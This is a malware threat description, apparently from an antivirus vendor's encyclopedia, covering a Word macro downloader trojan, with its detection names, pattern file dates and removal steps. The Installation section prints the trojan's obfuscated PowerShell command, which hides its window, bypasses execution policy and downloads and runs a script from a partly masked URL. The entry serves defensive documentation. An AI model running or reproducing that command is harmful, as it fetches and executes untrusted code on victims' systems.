Modified by: Earle Maui Earnshaw

ALIASES:

Trojan-Downloader.VBA.Agent, Trojan-Downloader.VBA.Agent (Ikarus)

 PLATFORM:

Windows

 OVERALL RISK RATING:
 DAMAGE POTENTIAL:
 DISTRIBUTION POTENTIAL:
 REPORTED INFECTION:
 INFORMATION EXPOSURE:

  • Threat Type: Trojan

  • Destructiveness: No

  • Encrypted:

  • In the wild: Yes

  OVERVIEW

Infection Channel: Downloaded from the Internet, Dropped by other malware

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

However, as of this writing, the said sites are inaccessible.

  TECHNICAL DETAILS

File Size: 21,207 bytes
File Type: DOC
Memory Resident: Yes
Initial Samples Received Date: 21 Jan 2020
Payload: Connects to URLs/IPs

Arrival Details

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

This Trojan adds the following processes:

  • PoWeRsHeLL.ExE -NoP -W HiDdEn -ExEc ByPaSs -NoNI IEX (NeW-ObJeCt Net.WeBClIeNt).DoWnLoAdStRiNg('https://{BLOCKED}in.com/raw/efuhihenef');

Download Routine

This Trojan connects to the following website(s) to download and execute a malicious file:

  • https://{BLOCKED}in.com/raw/efuhihenef

Other Details

However, as of this writing, the said sites are inaccessible.

  SOLUTION

Minimum Scan Engine: 9.850
FIRST VSAPI PATTERN FILE: 15.636.03
FIRST VSAPI PATTERN DATE: 22 Jan 2020
VSAPI OPR PATTERN File: 15.637.00
VSAPI OPR PATTERN Date: 23 Jan 2020

Step 1

Trend Micro Predictive Machine Learning detects and blocks malware at the first sign of its existence, before it executes on your system. When enabled, your Trend Micro product detects this malware under the following machine learning name:

     Downloader.VBA.TRX.XXVBAF01FF006

Step 2

Before doing any scans, Windows 7, Windows 8, Windows 8.1, and Windows 10 users must disable System Restore to allow full scanning of their computers.

Step 3

Note that not all files, folders, and registry keys and entries are installed on your computer during this malware's/spyware's/grayware's execution. This may be due to incomplete installation or other operating system conditions. If you do not find the same files/folders/registry information, please proceed to the next step.

Step 4

Scan your computer with your Trend Micro product to delete files detected as Trojan.W97M.POWLOAD.THJBBAI. If the detected files have already been cleaned, deleted, or quarantined by your Trend Micro product, no further step is required. You may opt to simply delete the quarantined files. Please check the following Trend Micro Support pages for more information:


Did this description help? Tell us how we did.